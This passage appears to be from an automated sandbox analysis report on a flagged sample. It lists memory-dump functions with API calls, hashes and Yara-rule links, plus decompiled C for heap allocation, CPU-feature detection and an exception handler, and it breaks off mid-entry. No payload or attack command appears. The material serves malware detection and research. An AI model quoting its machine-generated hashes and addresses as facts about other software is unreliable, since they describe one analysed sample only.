                  • Instruction Fuzzy Hash: 4011DFB5D006598FDB20CF9AD444BDEFBF4AB88224F14851AD829B7600C374A549CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 051DD238, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,00000018,00000001,?), ref: 051DD29D
                  Memory Dump Source
                  • Source File: 00000002.00000002.466410305.00000000051D0000.00000040.00000001.sdmp, Offset: 051D0000, based on PE: false
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: 3bce669d86952df2d43a1b9d50969ca9849b81a1c94294a2cc252bd3e70a2078
                  • Instruction ID: f384465c4f3d3f383e79b1826f751242fba2b7ad30fc4c0a2391ced449de601e
                  • Opcode Fuzzy Hash: 3bce669d86952df2d43a1b9d50969ca9849b81a1c94294a2cc252bd3e70a2078
                  • Instruction Fuzzy Hash: 3311B0B99003499EDB10CF99D589BDEBBF4EB48314F14881AE955A7600C378A5448FA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0232FE38, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                  Download Yara Rule
                  APIs
                  • SetWindowLongW.USER32(?,?,?), ref: 0232FE9D
                  Memory Dump Source
                  • Source File: 00000002.00000002.461616983.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                  Similarity
                  • API ID: LongWindow
                  • String ID:
                  • API String ID: 1378638983-0
                  • Opcode ID: 0a9d5891ee58fa131447ff1a2f60f0d31a818bac411b357e10caa6f9192c84f2
                  • Instruction ID: 70625b90484f5caa0d68a902c48204380ce85fbb8cc58b940819527f2fa8726d
                  • Opcode Fuzzy Hash: 0a9d5891ee58fa131447ff1a2f60f0d31a818bac411b357e10caa6f9192c84f2
                  • Instruction Fuzzy Hash: F41100B59003499FDB10CFA9D585BDEBBF4FB48324F20845AE859A7700C378AA45CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 05385A48, Relevance: 1.5, APIs: 1, Instructions: 46registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegCloseKey.KERNELBASE(00000000), ref: 0538642F
                  Memory Dump Source
                  • Source File: 00000002.00000002.466724123.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  • Opcode ID: 327214d784ec811e9839711273b433c3b16ea850687d9763f071353070a1f435
                  • Instruction ID: fcf92360e85c376f12a856b7c987b5fb8207f8eb66543322b2ce54c165c1563a
                  • Opcode Fuzzy Hash: 327214d784ec811e9839711273b433c3b16ea850687d9763f071353070a1f435
                  • Instruction Fuzzy Hash: F21103B49047588FCB20DF99D489BEEBBF4EB48314F10841AD519A7740D7B4A944CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 051DC3D0, Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051D226A,?,00000000,?), ref: 051DC435
                  Memory Dump Source
                  • Source File: 00000002.00000002.466410305.00000000051D0000.00000040.00000001.sdmp, Offset: 051D0000, based on PE: false
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: ecc142e6c6c7c922732b89a266768676766997137e6d06804fd6a30c43c14195
                  • Instruction ID: 6cb29b0e05fdee3e12319984df28cafb4182d4e3f091a9854c67f2df69b1f3ff
                  • Opcode Fuzzy Hash: ecc142e6c6c7c922732b89a266768676766997137e6d06804fd6a30c43c14195
                  • Instruction Fuzzy Hash: EC11F2B58003488FDB10CFA9D585BEEFBF4EB48314F10881AE454A7200C374A945CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 05380438, Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000002.00000002.466724123.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                  Similarity
                  • API ID: DispatchMessage
                  • String ID:
                  • API String ID: 2061451462-0
                  • Opcode ID: 35008da1b3f63cb55b9db33aa8ce63488aac06dd383dcdb60848cedc51c325f7
                  • Instruction ID: 11900a4f932d040ba228a2cd0b6aaa601115c253ce582496a41b11c5b7c92fd3
                  • Opcode Fuzzy Hash: 35008da1b3f63cb55b9db33aa8ce63488aac06dd383dcdb60848cedc51c325f7
                  • Instruction Fuzzy Hash: 0B11E0B4C04B499FCB14DF9AE448BDEBBF4AB48314F10851AE819A3710C378A544CFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0232FE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                  Download Yara Rule
                  APIs
                  • SetWindowLongW.USER32(?,?,?), ref: 0232FE9D
                  Memory Dump Source
                  • Source File: 00000002.00000002.461616983.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                  Similarity
                  • API ID: LongWindow
                  • String ID:
                  • API String ID: 1378638983-0
                  • Opcode ID: c957188c3a72d2e3dde2ee72af0154c3b1e5d87ab8d52214e9da20bf29f42523
                  • Instruction ID: e4fcc15bd39af3624025d2d0cd715a312e32cbbf2cf6bc4053c950043cec27f0
                  • Opcode Fuzzy Hash: c957188c3a72d2e3dde2ee72af0154c3b1e5d87ab8d52214e9da20bf29f42523
                  • Instruction Fuzzy Hash: DA1100B59002488FDB10CF99D488BDFBBF8EB48324F10841AE818A3700C374A944CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 051DBC59, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 051DBCBD
                  Memory Dump Source
                  • Source File: 00000002.00000002.466410305.00000000051D0000.00000040.00000001.sdmp, Offset: 051D0000, based on PE: false
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: 893d3a9982ce7dd2dc246d65f9ba59f3a9a807ba0050fc8b34c4eed198078488
                  • Instruction ID: d2a3e7e0f480a7bb82ce37b6266bf0a420438f23d8f2aca57145e9238ad79184
                  • Opcode Fuzzy Hash: 893d3a9982ce7dd2dc246d65f9ba59f3a9a807ba0050fc8b34c4eed198078488
                  • Instruction Fuzzy Hash: AA11CEB58047498FDB10CF99D585BDEBBF8FB48314F14881AE959A7600C378A544CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 05380440, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000002.00000002.466724123.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                  Similarity
                  • API ID: DispatchMessage
                  • String ID:
                  • API String ID: 2061451462-0
                  • Opcode ID: ef6f150b359ae1843de52627f526bd7ba9d13fd8ba2f3832bbda1539d3f7c391
                  • Instruction ID: 1082fcc1c887412119c5484adc100933f2addd2567f0068f31bb2f15e989f546
                  • Opcode Fuzzy Hash: ef6f150b359ae1843de52627f526bd7ba9d13fd8ba2f3832bbda1539d3f7c391
                  • Instruction Fuzzy Hash: 7E11BDB5D047598FCB24DF9AD448B9EBBF4AB48214F10852AE819A3310D378A544CFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403ECE, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E00403ECE(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x4132b0, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00403829();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00404831())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E004068FD(_t15, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}









                  0x00403ece
                  0x00403ed4
                  0x00403ed9
                  0x00403ee7
                  0x00403ee7
                  0x00403eed
                  0x00403eef
                  0x00403eef
                  0x00403f06
                  0x00403f0f
                  0x00403f17
                  0x00000000
                  0x00000000
                  0x00403ef7
                  0x00403ef9
                  0x00403f1b
                  0x00403f20
                  0x00403f26
                  0x00000000
                  0x00403f26
                  0x00403efc
                  0x00403f01
                  0x00403f02
                  0x00403f04
                  0x00000000
                  0x00000000
                  0x00403f04
                  0x00000000
                  0x00403f06
                  0x00403edf
                  0x00403ee5
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004043D5,00000001,00000364,?,?,?,00404836,0040374F,?,00401678,00000000,00000002), ref: 00403F0F
                  Memory Dump Source
                  • Source File: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: d0bbbf152570b497e93db0e472088487dc34fac96c5e1095bbbdb5b9e8cbb6b8
                  • Instruction ID: 17ee06be1e01d9d3fac17571a9f3cb3756af6567e7794f1bcf3b52ff780cb40a
                  • Opcode Fuzzy Hash: d0bbbf152570b497e93db0e472088487dc34fac96c5e1095bbbdb5b9e8cbb6b8
                  • Instruction Fuzzy Hash: BFF0B432904122A6DB216F269C05A6B3F6CEF81772B148537BD04F62D0CB38DE1186ED
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                  0x00403e3d
                  0x00403e43
                  0x00403e49
                  0x00403e7b
                  0x00403e80
                  0x00403e86
                  0x00000000
                  0x00403e86
                  0x00403e4d
                  0x00403e4f
                  0x00403e4f
                  0x00403e66
                  0x00403e6f
                  0x00403e77
                  0x00000000
                  0x00000000
                  0x00403e57
                  0x00403e59
                  0x00000000
                  0x00000000
                  0x00403e5c
                  0x00403e61
                  0x00403e62
                  0x00403e64
                  0x00000000
                  0x00000000
                  0x00403e64
                  0x00000000

                  APIs
                  • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                  Memory Dump Source
                  • Source File: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                  • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                  • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                  • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 021FD4C4, Relevance: .1, Instructions: 75COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.461273754.00000000021FD000.00000040.00000001.sdmp, Offset: 021FD000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 400556beb0ddca450252d459d9f4f0ba3949d7973785f0a7e622b8b954e35935
                  • Instruction ID: 45a1ef92ada7f5e95187f11d7421fd585c9e40364ed6c922e6857670bf76f687
                  • Opcode Fuzzy Hash: 400556beb0ddca450252d459d9f4f0ba3949d7973785f0a7e622b8b954e35935
                  • Instruction Fuzzy Hash: 2E2103B1544244DFDB55DF10E9C0B3ABF75FB88318F20C5A9EA154B266C336D846CBA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 021FD5B0, Relevance: .1, Instructions: 75COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.461273754.00000000021FD000.00000040.00000001.sdmp, Offset: 021FD000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e1fcc5336d466de693a22d5a82d18d29c5b359a8ed19d4f7e6678aa5826002ec
                  • Instruction ID: 39f91194ea1d110dfdfa7d32a54b9ea9d94ec542e7a96692d71fff124d66735e
                  • Opcode Fuzzy Hash: e1fcc5336d466de693a22d5a82d18d29c5b359a8ed19d4f7e6678aa5826002ec
                  • Instruction Fuzzy Hash: 5B2125B1548244DFDB55DF10E9C0F3ABF65FB88328F248569EA194B216C336D846CBE1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0220D1D4, Relevance: .1, Instructions: 72COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.461313964.000000000220D000.00000040.00000001.sdmp, Offset: 0220D000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8767f5cfc56ec0869aa46e6ff8e3a6809efb5578a6a0d729d12fa3fc107f05ca
                  • Instruction ID: e6fc6536eb125b8dbb67359ac75baa075f8a635681542a89f5eaf6ada0e508fa
                  • Opcode Fuzzy Hash: 8767f5cfc56ec0869aa46e6ff8e3a6809efb5578a6a0d729d12fa3fc107f05ca
                  • Instruction Fuzzy Hash: D621F870514204DFDB01DF94D5C0B26BB65FB88318F20C56DE9494B29BC3B6D846CA61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0220D01C, Relevance: .1, Instructions: 72COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.461313964.000000000220D000.00000040.00000001.sdmp, Offset: 0220D000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6c05ddceb98b3fbf2bc55c1fef5b6c0830d597bbb1c020f491ebad7ca5dc1366
                  • Instruction ID: 76867d62dea466051a77a8614f61ed70294c8589b69a302ca4aeb9e4fa041153
                  • Opcode Fuzzy Hash: 6c05ddceb98b3fbf2bc55c1fef5b6c0830d597bbb1c020f491ebad7ca5dc1366
                  • Instruction Fuzzy Hash: EA21F5B4618244DFDB14CFA4D9C0F26BB66FB84318F20C969D94D4B28BC377D846CA61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0220D007, Relevance: .1, Instructions: 61COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.461313964.000000000220D000.00000040.00000001.sdmp, Offset: 0220D000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 358a95aa167acc1245c9c21470787a324a7ef2af79622eaf67b4290cd9e89079
                  • Instruction ID: 188c908c23cdad7cffd38d98c284b898979da4ecb9c543ad966ac245402e52b4
                  • Opcode Fuzzy Hash: 358a95aa167acc1245c9c21470787a324a7ef2af79622eaf67b4290cd9e89079
                  • Instruction Fuzzy Hash: 54215E755093C08FCB12CF64D9D4B15BF72EB46314F28C5DAD8498B6A7C33A980ACB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 021FD4BF, Relevance: .1, Instructions: 56COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.461273754.00000000021FD000.00000040.00000001.sdmp, Offset: 021FD000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dbb96fce72df430d6a1d15ddaced34ce5aab7043dda010518d4ac8458859c443
                  • Instruction ID: 766a45b85cce92e39ea219a1931c7c25fb840a06ef7b3ad210a3ddae43215f91
                  • Opcode Fuzzy Hash: dbb96fce72df430d6a1d15ddaced34ce5aab7043dda010518d4ac8458859c443
                  • Instruction Fuzzy Hash: EA11E676544284CFCF12CF10E5C4B26BF71FB84328F24C6A9D9450B666C336D45ADBA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 021FD5AB, Relevance: .1, Instructions: 56COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.461273754.00000000021FD000.00000040.00000001.sdmp, Offset: 021FD000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dbb96fce72df430d6a1d15ddaced34ce5aab7043dda010518d4ac8458859c443
                  • Instruction ID: 80a37172dbe6e9771079273fac3dd202ef3e85bd68e8f18068eacd77285a6e9f
                  • Opcode Fuzzy Hash: dbb96fce72df430d6a1d15ddaced34ce5aab7043dda010518d4ac8458859c443
                  • Instruction Fuzzy Hash: 6F1181B6544284DFCF16CF10D5C4B26BF62FB84324F24C6A9D9094B656C336D45ACBE1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0220D1CF, Relevance: .1, Instructions: 53COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.461313964.000000000220D000.00000040.00000001.sdmp, Offset: 0220D000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9d732c08f3ee985a9e234549e13288c252ddd5d76c890c27dfd6597ed4574425
                  • Instruction ID: e8dca8c34cdff0f0ea7a3e94620bcb758ad8e8de0249e4f555fce460ae44214e
                  • Opcode Fuzzy Hash: 9d732c08f3ee985a9e234549e13288c252ddd5d76c890c27dfd6597ed4574425
                  • Instruction Fuzzy Hash: D811BB75904280DFDB02CF94C5C0B15BBA1FB88314F24C6AED8494B69BC37AD40ACB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 021FD01D, Relevance: .0, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.461273754.00000000021FD000.00000040.00000001.sdmp, Offset: 021FD000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ee4bca61cbbbbb332fc49d056de135067f0b6bd0699721a755f53bc7aeed7d40
                  • Instruction ID: 0f517e665fa5864a37a37e1effcc909c00eaf8072ec2bcc53f10b28b05ccacd6
                  • Opcode Fuzzy Hash: ee4bca61cbbbbb332fc49d056de135067f0b6bd0699721a755f53bc7aeed7d40
                  • Instruction Fuzzy Hash: 400126B044C344AEE7508F25EC80B77FBC8EF41268F19C41AEF645B686C3789949C6B1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 021FD006, Relevance: .0, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.461273754.00000000021FD000.00000040.00000001.sdmp, Offset: 021FD000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1a955c2d5852e3ebdd47be899e291f9eccbbe581b3d900bdb60af28df8e86163
                  • Instruction ID: e817120d4ab7e29b898afd7eea3b55940ae313c4c8c73e09116934e0d2d965e0
                  • Opcode Fuzzy Hash: 1a955c2d5852e3ebdd47be899e291f9eccbbe581b3d900bdb60af28df8e86163
                  • Instruction Fuzzy Hash: B2014C6140D3C49ED7128B259894B62BFB4EF43224F19C1CBE9948F2A7C3699849C772
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 0040446F, Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                  Download Yara Rule
                  C-Code - Quality: 74%
                  			E0040446F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				long _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				int _t66;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t64 = __edx;
				_t59 = __ebx;
				_t40 =  *0x412014; // 0xb75fb7c4
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				_push(_t65);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00401E6A(_t41);
					_pop(_t60);
				}
				E00402460(_t65,  &_v804, 0, 0x50);
				E00402460(_t65,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t60;
				_v556 = _t64;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t65;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t66 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t57 = UnhandledExceptionFilter( &_v812);
				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00401E6A(_t57);
				}
				E004018CC();
				return _t57;
			}






































                  0x0040446f
                  0x0040446f
                  0x0040446f
                  0x0040447a
                  0x0040447f
                  0x00404481
                  0x00404488
                  0x00404489
                  0x0040448b
                  0x0040448e
                  0x00404493
                  0x00404493
                  0x0040449f
                  0x004044b2
                  0x004044c0
                  0x004044c6
                  0x004044cc
                  0x004044d2
                  0x004044d8
                  0x004044de
                  0x004044e4
                  0x004044ea
                  0x004044f0
                  0x004044f6
                  0x004044fd
                  0x00404504
                  0x0040450b
                  0x00404512
                  0x00404519
                  0x00404520
                  0x00404521
                  0x0040452a
                  0x00404530
                  0x00404533
                  0x00404539
                  0x00404546
                  0x0040454f
                  0x00404558
                  0x00404561
                  0x0040456f
                  0x00404571
                  0x0040457e
                  0x00404586
                  0x00404592
                  0x00404595
                  0x0040459a
                  0x004045a1
                  0x004045a9

                  APIs
                  • IsDebuggerPresent.KERNEL32 ref: 00404567
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404571
                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0040457E
                  Memory Dump Source
                  • Source File: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                  • String ID:
                  • API String ID: 3906539128-0
                  • Opcode ID: 2402715568fd3a7f033aea0833c586b82d8bbb398bbe1fad897268afcc2e17dd
                  • Instruction ID: 1195a769eb9e4d04bd79abb1e2ff1cfbb043d98aa737aaf25acc392e7af51fe4
                  • Opcode Fuzzy Hash: 2402715568fd3a7f033aea0833c586b82d8bbb398bbe1fad897268afcc2e17dd
                  • Instruction Fuzzy Hash: 5931C674901218EBCB21DF64DD8878DB7B4BF48310F5042EAE50CA7290E7749F858F49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040208D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			E0040208D(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr _t65;
				signed int _t66;
				signed int _t68;
				intOrPtr _t73;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t84;
				intOrPtr* _t86;
				signed int _t91;
				signed int _t94;

				_t84 = __edx;
				 *0x412b2c =  *0x412b2c & 0x00000000;
				 *0x412030 =  *0x412030 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v24 = _v24 & 0x00000000;
				 *0x412030 =  *0x412030 | 0x00000002;
				 *0x412b2c = 1;
				_t86 =  &_v48;
				_push(1);
				asm("cpuid");
				_pop(_t73);
				 *_t86 = 0;
				 *((intOrPtr*)(_t86 + 4)) = 1;
				 *((intOrPtr*)(_t86 + 8)) = 0;
				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
				_v16 = _v48;
				_v8 = _v36 ^ 0x49656e69;
				_v12 = _v40 ^ 0x6c65746e;
				_push(1);
				asm("cpuid");
				_t75 =  &_v48;
				 *_t75 = 1;
				 *((intOrPtr*)(_t75 + 4)) = _t73;
				 *((intOrPtr*)(_t75 + 8)) = 0;
				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
					L9:
					_t91 =  *0x412b30; // 0x2
					L10:
					_v32 = _v36;
					_t59 = _v40;
					_v8 = _t59;
					_v28 = _t59;
					if(_v16 >= 7) {
						_t65 = 7;
						_push(_t75);
						asm("cpuid");
						_t77 =  &_v48;
						 *_t77 = _t65;
						 *((intOrPtr*)(_t77 + 4)) = _t75;
						 *((intOrPtr*)(_t77 + 8)) = 0;
						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
						_t66 = _v44;
						_v24 = _t66;
						_t59 = _v8;
						if((_t66 & 0x00000200) != 0) {
							 *0x412b30 = _t91 | 0x00000002;
						}
					}
					if((_t59 & 0x00100000) != 0) {
						 *0x412030 =  *0x412030 | 0x00000004;
						 *0x412b2c = 2;
						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
							asm("xgetbv");
							_v20 = _t59;
							_v16 = _t84;
							if((_v20 & 0x00000006) == 6 && 0 == 0) {
								_t62 =  *0x412030; // 0x2f
								_t63 = _t62 | 0x00000008;
								 *0x412b2c = 3;
								 *0x412030 = _t63;
								if((_v24 & 0x00000020) != 0) {
									 *0x412b2c = 5;
									 *0x412030 = _t63 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t68 = _v48 & 0x0fff3ff0;
				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
					_t94 =  *0x412b30; // 0x2
					_t91 = _t94 | 0x00000001;
					 *0x412b30 = _t91;
					goto L10;
				} else {
					goto L9;
				}
			}



























                  0x0040208d
                  0x00402090
                  0x0040209e
                  0x004020ad
                  0x0040222a
                  0x00402230
                  0x00402230
                  0x004020b3
                  0x004020b9
                  0x004020c4
                  0x004020ca
                  0x004020cd
                  0x004020ce
                  0x004020d2
                  0x004020d3
                  0x004020d5
                  0x004020d8
                  0x004020dd
                  0x004020e6
                  0x004020f7
                  0x00402102
                  0x00402108
                  0x00402109
                  0x00402111
                  0x00402117
                  0x00402119
                  0x0040211c
                  0x0040211f
                  0x00402122
                  0x00402167
                  0x00402167
                  0x0040216d
                  0x00402174
                  0x00402177
                  0x0040217a
                  0x0040217d
                  0x00402180
                  0x00402184
                  0x00402187
                  0x00402188
                  0x0040218d
                  0x00402190
                  0x00402192
                  0x00402195
                  0x00402198
                  0x0040219b
                  0x004021a3
                  0x004021a6
                  0x004021a9
                  0x004021ae
                  0x004021ae
                  0x004021a9
                  0x004021bb
                  0x004021bd
                  0x004021c4
                  0x004021d3
                  0x004021de
                  0x004021e1
                  0x004021e4
                  0x004021f5
                  0x004021fb
                  0x00402200
                  0x00402203
                  0x00402211
                  0x00402216
                  0x0040221b
                  0x00402225
                  0x00402225
                  0x00402216
                  0x004021f5
                  0x004021d3
                  0x00000000
                  0x004021bb
                  0x00402127
                  0x00402131
                  0x00402156
                  0x0040215c
                  0x0040215f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004020A6
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: FeaturePresentProcessor
                  • String ID:
                  • API String ID: 2325560087-3916222277
                  • Opcode ID: 81a6643d8d766bf2a1e14be1042f56af57549ae9e9951545f306693b5f2864aa
                  • Instruction ID: 00a0b3a4e6e1703bd72bf57860e68eebd2cbb95fa7def28fde3004e4e54fdf29
